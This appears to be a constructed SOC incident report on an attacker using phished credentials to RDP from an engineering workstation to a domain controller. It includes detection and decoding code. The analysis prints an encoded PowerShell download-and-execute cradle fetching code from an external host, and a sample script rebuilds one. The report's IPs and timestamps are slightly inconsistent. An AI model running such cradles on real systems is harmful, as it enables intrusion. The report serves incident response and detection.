Cisco ISE Alert Details
Alert ID: ISE-REMOTE-SERVICES-1021-7842
Alert Time: 2024-02-25 14:15:33 EST
Severity: HIGH (85/100)
Source: Cisco Identity Services Engine (ISE)
Rule: “Unusual RDP Connection to Critical Server”
MITRE ATT&CK: T1021.001 – Remote Services: Remote Desktop Protocol
Alert Details:
Detection: RDP connection from unusual endpoint to domain controller
Connection Details:
Source: 192.168.45.78 (ENG-WS-045 – Engineering Workstation)
Destination: 192.168.10.10 (DC-01 – Primary Domain Controller)
User: rpatel@company.com (Raj Patel, Engineer)
Time: 14:10-14:15 EST
Protocol: RDP (TCP/3389)
Session Duration: 5 minutes
Contextual Anomalies:
User rpatel never connects to domain controllers (normal access: file servers only)
Source host is engineering workstation (not IT/admin)
Destination is critical infrastructure (DC)
Time of day: 14:10 (unusual for admin tasks)
No change management ticket for this access
Activity During Session (from EDR logs):
14:11 – PowerShell launched (encoded command)
14:12 – Attempted to enumerate AD users
14:13 – Attempted to access LSASS (blocked)
14:14 – Scheduled task created: “SystemCheck”
14:15 – Session terminated (ISE triggered)
Detection Logic:
User-to-server mapping anomaly (engineer to DC)
Behavioral baseline violation
Process activity indicative of post-exploitation
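The three detection conditions listed above (user-to-server mapping anomaly, behavioral baseline violation, missing change ticket) as an added Python example; this is not code from the ISE alert or the report. The host inventory, the historical RDP session records and the 30-points-per-reason weighting are constructed assumptions.

```python
from collections import defaultdict

# Constructed host inventory: IP -> (hostname, role).
HOST_ROLES = {
    "192.168.10.10": ("DC-01", "domain_controller"),
    "192.168.20.5": ("FS-01", "file_server"),
    "192.168.45.78": ("ENG-WS-045", "engineering_workstation"),
    "192.168.5.2": ("PAW-01", "admin_jump_host"),
}
CRITICAL_ROLES = {"domain_controller"}
ALLOWED_SOURCE_ROLES = {"admin_jump_host"}  # only PAWs may RDP to critical hosts

# Constructed historical RDP sessions: (timestamp, user, src_ip, dst_ip).
BASELINE_SESSIONS = [
    ("2024-02-20 09:05", "rpatel", "192.168.45.78", "192.168.20.5"),
    ("2024-02-21 10:12", "rpatel", "192.168.45.78", "192.168.20.5"),
    ("2024-02-22 11:30", "admin1", "192.168.5.2", "192.168.10.10"),
]
# The session from the alert, as a constructed record.
ALERT_SESSION = ("2024-02-25 14:10", "rpatel", "192.168.45.78", "192.168.10.10")

def build_baseline(sessions):
    """Map each user to the set of destination IPs they have used before."""
    seen = defaultdict(set)
    for _ts, user, _src, dst in sessions:
        seen[user].add(dst)
    return seen

def score_rdp_session(session, baseline, has_change_ticket=False):
    """Return (score, reasons) for one RDP session checked against the baseline."""
    _ts, user, src, dst = session
    src_name, src_role = HOST_ROLES.get(src, (src, "unknown"))
    dst_name, dst_role = HOST_ROLES.get(dst, (dst, "unknown"))
    reasons = []
    # Behavioral baseline violation: this user has never RDP'd to this host.
    if dst not in baseline.get(user, set()):
        reasons.append(f"{user} has no prior RDP session to {dst_name}")
    # User-to-server mapping anomaly: critical host reached from a non-admin source.
    if dst_role in CRITICAL_ROLES and src_role not in ALLOWED_SOURCE_ROLES:
        reasons.append(f"{src_name} ({src_role}) reached critical host {dst_name}")
    # No change-management approval for access to a critical host.
    if dst_role in CRITICAL_ROLES and not has_change_ticket:
        reasons.append(f"no change ticket for access to {dst_name}")
    # Constructed weighting: 30 points per reason, capped at 100.
    return min(100, 30 * len(reasons)), reasons

if __name__ == "__main__":
    score, reasons = score_rdp_session(ALERT_SESSION, build_baseline(BASELINE_SESSIONS))
    print(score, reasons)
```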
SOC Investigation Process
Step | Action | Tools Used | Findings
1. Alert Validation | Verify Cisco ISE alert | ISE Console, AD Logs | Confirmed anomalous RDP connection
2. Process Investigation | Check activity on DC-01 | CrowdStrike Falcon | PowerShell executed, scheduled task created
3. User Interview | Contact rpatel | Teams, Phone | User did NOT initiate RDP session
4. Immediate Action | Isolate ENG-WS-045 | CrowdStrike | Engineering host quarantined
5. Account Remediation | Disable rpatel account | Azure AD, AD | Account disabled
6. Clean DC | Remove scheduled task | PowerShell | Scheduled task “SystemCheck” deleted
Jira Incident Report
Ticket: SOC-2024-127
Summary: T1021 – Unauthorized RDP to Domain Controller from Compromised Engineering Host
Status: RESOLVED
Resolution: MALICIOUS – Lateral Movement Blocked
Priority: P1 – CRITICAL
Labels: T1021, remote-services, rdp, lateral-movement, cisco-ise, compromised-account
Components: Network-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Cisco Identity Services Engine (ISE).
Alert: “Unusual RDP Connection to Critical Server”.
Source: ENG-WS-045 (Engineering, user rpatel).
Destination: DC-01 (Primary Domain Controller).
Time: 2024-02-25 14:15 EST.
Technique: MITRE ATT&CK T1021.001 – Remote Services: Remote Desktop Protocol.
2. Technical Analysis:
Attack Chain:
13:45 – rpatel credentials compromised via phishing
13:50 – Attacker logs into ENG-WS-045 via RDP (from external IP)
13:55 – Attacker uses compromised credentials to RDP to DC-01
14:10-14:15 – Attacker on DC-01
14:11-14:14 – Malicious activities
14:15 – ISE detects anomaly
Activities on DC-01:
PowerShell Encoded Command:
powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAxADQAMwAuADIAMgAxAFsALgA5ADgALwB1AHAAZABhAHQAZQAnACkA
Decoded: IEX (New-Object Net.WebClient).DownloadString('http://185.143.221[.]89/update')
Scheduled Task Created:
Name: “SystemCheck”
Action: PowerShell to download and execute payload hourly
Status: Created but not triggered yet
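Decoding and triaging a PowerShell -EncodedCommand argument of the kind recorded in the EDR log above, as an added Python example that is not from the report. The sample command line is constructed (the script text is encoded at runtime and points at a TEST-NET documentation address, not the report's indicator), and the cradle patterns are an assumed starting set.

```python
import base64
import re

# Constructed sample, encoded here so the block is self-contained; the URL is a
# documentation (TEST-NET-3) address, not the indicator from the report.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/update')"
SAMPLE_CMDLINE = "powershell -NoP -EncodedCommand " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

# Assumed patterns typical of in-memory download-and-execute cradles.
CRADLE_PATTERNS = {
    "invoke_expression": re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
    "webclient": re.compile(r"Net\.WebClient", re.I),
    "download_call": re.compile(r"Download(String|File|Data)\s*\(", re.I),
}
URL_PATTERN = re.compile(r"https?://[^\s'\")]+", re.I)

def extract_encoded_command(cmdline):
    """Return the argument following -EncodedCommand (or an abbreviation such as
    -enc, -e or -ec, which PowerShell accepts), else None."""
    parts = cmdline.split()
    for i, part in enumerate(parts[:-1]):
        flag = part.lstrip("-/").lower()
        if flag == "ec" or (flag and "encodedcommand".startswith(flag)):
            return parts[i + 1]
    return None

def decode_encoded_command(b64):
    """PowerShell encodes the script as UTF-16LE before base64; None if undecodable."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage_cmdline(cmdline):
    """Return (text_inspected, matched_pattern_names, urls) for one process command line."""
    enc = extract_encoded_command(cmdline)
    text = decode_encoded_command(enc) if enc else None
    if text is None:
        text = cmdline  # not encoded (or undecodable): inspect the raw command line
    hits = [name for name, rx in CRADLE_PATTERNS.items() if rx.search(text)]
    return text, hits, URL_PATTERN.findall(text)

if __name__ == "__main__":
    print(triage_cmdline(SAMPLE_CMDLINE))
```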
Lateral Movement:
Attacker moved from compromised engineering host to domain controller
Gained foothold on critical infrastructure
Attempted to establish persistence
3. Investigation Findings:
Timeline:
13:45 – Credentials compromised
13:50 – Attacker on ENG-WS-045
14:10 – RDP to DC-01
14:11-14:14 – Malicious actions
14:15 – ISE alert
14:17 – SOC investigates
14:18 – ENG-WS-045 isolated
14:19 – rpatel account disabled
14:20 – Scheduled task removed
14:21 – Attacker RDP session terminated
Indicators of Compromise (IoCs):
Network:
– Attacker external IP: 185.143.221[.]89
– Internal RDP: 192.168.45.78 -> 192.168.10.10
Account:
– rpatel (compromised)
Scheduled Task:
– DC-01: “SystemCheck” (deleted)
File:
– C:\Windows\Temp\update.ps1 (deleted)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Disabled rpatel account.
Terminated RDP session.
Deleted scheduled task from DC-01.
Removed any downloaded files.
DC-01 Remediation:
Full scan (no other malware).
Verified no persistence mechanisms.
Credential rotation for all domain admins (precaution).
User Remediation:
rpatel password reset.
MFA enforced.
5. Root Cause Analysis:
Primary Cause: User credentials compromised via phishing.
Contributing Factors:
No MFA on account.
RDP allowed from any internal host to DC.
Over-privileged user (engineer should not have RDP to DC).
6. Business Impact:
Operational Impact: DC-01 offline for 30 minutes for cleanup.
Security Impact: Attacker gained brief access to domain controller; persistence prevented.
7. Remediation & Prevention:
Completed Actions:
Lateral movement blocked.
DC cleaned.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Restricted RDP to DC to specific admin jump hosts (PAW).
Implemented network segmentation.
Enhanced monitoring for RDP to critical servers.
8. Conclusion:
An attacker used compromised credentials to RDP from an engineering workstation to a domain controller, performing malicious actions and attempting to establish persistence via a scheduled task. Cisco ISE detected the anomalous connection, enabling rapid containment. The DC was cleaned before any significant damage occurred.
Closure Rationale: Lateral movement blocked; DC cleaned; account secured.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-25 15:30 EST